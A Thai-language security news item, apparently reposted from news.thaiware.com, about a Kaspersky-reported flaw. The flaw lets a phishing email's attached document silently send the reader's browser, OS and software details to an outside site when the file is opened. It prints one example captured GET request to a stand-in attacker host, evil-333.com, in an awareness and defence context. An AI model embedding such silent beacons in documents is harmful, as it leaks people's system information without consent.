ระวัง! ถูกแฮกข้อมูลแบบไม่รู้ตัว ถ้าเปิดดูไฟล์ในอีเมลที่ไม่น่าไว้วางใจ

0
662

Kaspersky Lab ค้นพบช่องทางขโมยข้อมูลแบบใหม่ ในฟีเจอร์ของโปรแกรมพิมพ์เอกสารยอดนิยม ที่สามารถนำมาใช้ดักจับข้อมูลต่างๆ ไม่ว่าจะเป็น ข้อมูลเบราว์เซอร์ ข้อมูลเวอร์ชั่นของระบบปฏิบัติการ ข้อมูลซอฟต์แวร์ หรืออุปกรณ์ที่เปิดไฟล์ ทั้งบนคอมพิวเตอร์พีซี และมือถือสมาร์ทโฟน ได้แบบชนิดที่เรียกว่า "แนบเนียนสุดๆ

ตัวอย่างไฟล์เอกสาร "คำแนะนำวิธีการใช้กูเกิ้ลเสิร์ชเอนจิ้นให้ได้ประโยชน์สูงสุด" ที่ดูเหมือนจะไม่มีอะไร แต่ภายในมีโค้ดล้วงข้อมูลฝังอยู่

สิ่งที่จะทำให้ช่องโหว่นี้ทำงานก็คือ ไฟล์เอกสารที่แนบมาใน ฟิชชิงอีเมล (อีเมลที่หลอกให้คนกดเข้าไปอ่าน) หากผู้ใช้ "เปิดดูไฟล์" มันก็จะทำการส่งคำขอ GET Request ไปยังเว็บไซต์ภายนอกพร้อมกับข้อมูลต่างๆ โดยที่เราไม่รู้ตัว

*ตัวอย่างข้อมูลที่ถูกส่งไปยังเว็บไซต์ภายนอก
GET http://evil-333.com/cccccccccccc/ccccccccc/ccccccccc.php?cccccccccc HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; InfoPath.2; MSOffice 12)
Accept-Encoding: gzip, deflate
Host: evil-333.com
Proxy-Connection: Keep-Alive

และข้อมูลที่ถูกส่งออกไปนั้น มีทั้งประเภทของเว็บเบราว์เซอร์ที่ใช้ (Browser) ข้อมูลเวอร์ชั่นระบบปฏิบัติการ (OS) ข้อมูลซอฟต์แวร์ต่างๆ ที่ติดตั้งในเครื่อง (Trident, SLCC, .NET ฯลฯ) รวมถึงโปรแกรมที่ใช้เปิดไฟล์นั้นอีกด้วย ถือว่าเป็นเรื่องที่อันตรายมากๆ หากข้อมูลเหล่านี้อยู่ในมือแฮกเกอร์ อาจส่งผลเสียร้ายแรง และไม่แน่ว่าอาจจะถูกเจาะเข้าระบบง่ายขึ้นก็ได้นะ โดยช่องโหว่นี้ทาง Kaspersky Lab ได้แจ้งให้ผู้มีส่วนเกี่ยวข้องทราบเรียบร้อยแล้ว แต่ยังไม่มีการตอบกลับมาแต่อย่างใด เราคงต้องรอติดตามข่าวกันอีกที

อย่างไรก็ตามผู้เขียนมีวิธีป้องกันตัวแบบง่ายที่ใครๆ ก็ทำได้มาแนะนำก็คือ หลีกเลี่ยงการดาวน์โหลดไฟล์ต่างๆ ที่เราไม่รู้แหล่งที่มา และถ้าจำเป็นต้องเปิดจริงๆ ให้นำชื่อของแหล่งที่มานั้น ไปเสิร์ชหาข้อมูลบนอินเทอร์เน็ตก่อน เมื่อเราคิดว่ามั่นใจแล้วจึงค่อยเปิดดู ซึ่งวิธีนี้ยังใช้ป้องกันมัลแวร์ต่างๆ ได้อีกด้วยนะ หวังว่าข้อมูลนี้จะมีประโยชน์ไม่มากก็น้อยแก่ผู้อ่านทุกคน

 

ที่มา – news.thaiware.com

Comments

comments